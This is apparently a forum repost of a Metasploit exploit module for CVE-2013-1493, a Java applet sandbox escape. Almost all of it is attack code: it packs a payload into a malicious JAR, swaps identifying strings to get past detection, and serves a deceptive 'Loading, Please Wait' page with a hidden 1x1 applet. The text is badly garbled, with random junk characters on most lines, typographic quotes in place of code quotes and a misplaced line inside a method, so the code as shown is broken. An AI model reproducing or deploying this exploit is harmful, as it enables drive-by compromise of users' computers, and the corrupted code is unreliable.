##
# n2 t! X' r# L3 s
! g" a5 ^7 A) S' `# This file is part of the Metasploit Framework and may be subject to7 b1 @: M- V0 P$ g+ F2 a; [
# redistribution and commercial restrictions. Please see the Metasploit
$ }5 n7 j/ f5 G' J# web site for more information on licensing and terms of use.1 v- u1 N/ W. l7 t
# http://metasploit.com/
4 \( n+ N' ~! P% {##) t+ o4 N/ y, \
require ‘msf/core’) T. W8 B* v, r+ z1 ~9 S
require ‘rex’
5 H* p& O- i8 Eclass Metasploit3 < Msf::Exploit::Remote; z9 I$ d' E0 H2 l# E$ ?4 g' C) U
Rank = NormalRanking
4 b2 j! ]# Y* `include Msf::Exploit::Remote::HttpServer::HTML6 ~5 p3 `& B/ e# f6 ]( z# _3 N! b5 e7 t
include Msf::Exploit::EXE
4 }: }/ Z5 J$ g1 o/ _: ]$ x' n2 C; B Ninclude Msf::Exploit::Remote::BrowserAutopwn
& e) E3 z% I" h) q( M C. @autopwn_info({ :javascript => false })
F# v; j" f# s0 Z6 ~( Wdef initialize( info = {} )2 \0 F1 ~) S/ B6 A
super( update_info( info,6 ^% j: A' G( A; J5 A
‘Name’ => ‘Java CMM Remote Code Execution’," Z( K. Q# s! O8 {& P( L6 U% G* }
‘Description’ => %q{" M7 N# }- Z% N9 x! u1 S( B% r; t
This module abuses the Color Management classes from a Java Applet to run
0 E% J! u5 a1 E4 u% carbitrary Java code outside of the sandbox as exploited in the wild in February& \7 H6 g/ i' e( |8 X# U1 m
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
" ~3 t! b& m$ h/ v7 s( M5 ^4 `5 ?( Land earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
9 ?, \& u& @/ e5 ~( t3 B9 z' Ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java% L, ]. a/ p0 T
warning in order to run the malicious applet.
# ]2 S- t/ i! u5 P},
5 T$ m3 x" a; I$ J- X! r7 p+ K! \‘License’ => MSF_LICENSE,
8 c8 F ~$ n: c6 v" u‘Author’ =>
& z; ~ C' U/ _'Unknown', # Vulnerability discovery and Exploit
" i1 x6 [: J* X9 ^0 I* q" D! G6 r6 v'juan vazquez' # Metasploit module (just ported the published exploit)
4 |) [1 }4 u& J$ y1 z+ ~: Y],
) ?! q L, m' f9 ]8 s; b- N‘References’ =>
. j# B7 X% V. X$ D( D( N* M$ s9 A# t& }( @[" B9 Q% t( |. F/ q* F
[ 'CVE', '2013-1493' ],
( C1 y3 }0 C9 c4 e- \# `[ 'OSVDB', '90737' ],
/ ^0 g/ ~: m; P1 F; j[ 'BID', '58238' ],+ b( ?* j9 ?- n. {- `. [
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
9 W+ o: Y- W* G9 c8 V; ~[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 M" B, \" @/ D6 L% ^& ] w5 W) {[ 'URL', 'http://pastie.org/pastes/6581034' ]2 L3 j+ i; j* }0 J, ^ c3 ^
],2 J! A* }2 V% f1 g3 V8 t
‘Platform’ => [ 'win', 'java' ],
: D) F: \+ {3 v: O‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
1 m1 S8 _# L( l$ R" ^‘Targets’ =>
: i, J# v- q4 H6 g1 y# w. H" [[2 R8 v# e: G( S* w
[ 'Generic (Java Payload)',
+ [% X" [8 g% @' P{- A' c* f6 u. [) m
'Platform' => 'java',7 j3 j0 p2 O8 R8 M' A
'Arch' => ARCH_JAVA
. N# \, v9 E; }3 O& c# y}
) {# D. K& ?/ ]7 z( @],
! X9 _. R) J0 d* Z[ 'Windows x86 (Native Payload)',2 o5 F# [+ J z% Z2 M4 N& q
{; ]/ `9 ]+ ]# d7 u+ w
'Platform' => 'win',
* O- T8 A# _, V: ~$ f0 ?% W+ l'Arch' => ARCH_X86
0 [( Y, |- q. z3 l Y5 ?. ?$ E}, V1 [) ^: k. J" ?) Z. W% h7 q
]% b& y+ t0 U8 C. k! h7 c
],1 v- }3 ^+ w6 z5 M+ e2 M
‘‘DisclosureDate’ => ‘Mar 01 2013′
$ [' K$ \& N! ?5 O))
0 f, _. D+ m X4 ^, h4 O- jend( G0 s# k* c& D! Z- X
def setup
/ V' I" \. e: q% b/ }5 Q( U3 ~3 Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)8 n5 a; A j3 [! T. w
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }8 d/ Y0 q, d( u. Y9 k- O0 E2 p3 N
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)4 o- |2 ?+ {/ g* @+ w
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
. @/ F8 i9 r; H: epath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)5 Y! H% [/ i) I0 r
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }3 e3 Q& F9 p, R7 m$ f1 K- |4 F
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)! J& S+ m: K4 h6 k6 R! g
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 k5 w" ~" P2 F" \@init_class_name = rand_text_alpha(“Init”.length)* p5 v9 Y& A+ J% ~1 S/ e" ~% ~
@init_class.gsub!(“Init”, @init_class_name)6 L# l( l3 y6 U9 u0 I( k W) N+ c
super: \* ]& ]6 X0 P5 O" E {
end- \' C% [. }+ A" T
def on_request_uri(cli, request)' G- I! ]: q, [4 l
print_status(“handling request for #{request.uri}”)- f' Q I. l# L1 }
case request.uri" q+ D# {, M' ]5 q# S& O7 V
when /\.jar$/i
) p: L1 Y) s; x$ n1 C& }; O* Pjar = payload.encoded_jar
1 S2 o9 X" m, J! X: Y2 m" G7 Rjar.add_file(“#{@init_class_name}.class”, @init_class)& _4 Z2 z, f; e
jar.add_file(“Leak.class”, @leak_class)( d1 n) W" ]3 `5 c
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)9 ^0 Z9 L/ c6 Y7 _
jar.add_file(“MyColorSpace.class”, @color_space_class)
0 g* T( I! v: j- A0 W% ^- ZDefaultTarget’ => 1,: P* w' ?2 _( P5 d6 k
metasploit_str = rand_text_alpha(“metasploit”.length)7 _4 s) X: A# X$ D
payload_str = rand_text_alpha(“payload”.length)
4 |. ^( _6 ~$ L: S1 ojar.entries.each { |entry|
$ C) d$ g8 X. C- `entry.name.gsub!(“metasploit”, metasploit_str)
/ e. u- P) [ dentry.name.gsub!(“Payload”, payload_str)9 U8 P5 |* H$ R# Z! f2 `9 w1 p$ M
entry.data = entry.data.gsub(“metasploit”, metasploit_str)& _2 B0 t1 a9 @. N: p
entry.data = entry.data.gsub(“Payload”, payload_str)
! q& e6 x$ |9 J4 y& n# P2 ^}
# }+ C( v& Y B( D- g8 mjar.build_manifest
* I& ?$ H3 D; e+ nsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })7 @1 E" s) q5 k$ C6 ?" a
when /\/$/2 U3 I( B' i! E! B
payload = regenerate_payload(cli)
( |! a9 @, j! B! Jif not payload
6 w8 z( w& p/ b8 Wprint_error(“Failed to generate the payload.”)
* I( ], y: k% psend_not_found(cli)
- ^. g: T) a6 l$ [2 @return
) X$ R7 ^$ N# g! H" k% s0 R! lend+ w. _4 ~4 A6 z8 s/ B
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
! }1 c4 F: v$ D/ V2 l( I+ F( ]/ ~else
; c9 D% Y, ^, r ?send_redirect(cli, get_resource() + ‘/’, ”)0 m. _( P4 U( D" P8 T k: [ X
end5 d8 ]" H% y2 t
end
* G1 N# u% j" S& Pdef generate_html) G B4 h: x6 ]! X
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|0 o. O' R$ D c! Y0 a2 N1 U Q
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|, z: W8 w0 t) Z5 k- {( K
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|# z' N9 L( x" i- o' w+ F: G4 }$ Y, h& _
html += %Q|</applet></body></html>|
V! m/ R5 [( nreturn html& Y3 D5 }" y; i; B: t% z: r* t
end4 P* \) }( u. L B; z/ R7 C. N
end/ f" s7 w* T) M) A
end9 s: v5 O) S+ }9 v F, R" Q' T+ n
|
发表于 2013-4-4 17:31:17
收藏
分享
支持
反对